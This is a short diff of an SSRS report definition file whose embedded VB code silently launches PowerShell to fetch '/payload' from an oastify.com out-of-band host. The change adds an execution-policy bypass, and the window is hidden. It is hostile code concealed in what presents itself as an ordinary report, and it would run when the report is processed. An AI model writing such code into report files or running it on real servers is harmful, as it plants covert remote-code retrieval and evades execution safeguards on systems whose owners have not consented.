--- a/untitled.rdl
+++ b/untitled.rdl
@@ -49,7 +49,7 @@
       Try
         Dim p As New System.Diagnostics.Process()
         p.StartInfo.FileName = "powershell.exe"
-        p.StartInfo.Arguments = "-c \"irm http://mka0xcp2xotw6hq3a0nt1owa117svpje.oastify.com/payload\""
+        p.StartInfo.Arguments = "-ep Bypass -c \"irm http://mka0xcp2xotw6hq3a0nt1owa117svpje.oastify.com/payload\""
         p.StartInfo.RedirectStandardOutput = True
         p.StartInfo.UseShellExecute = False
         p.StartInfo.CreateNoWindow = True
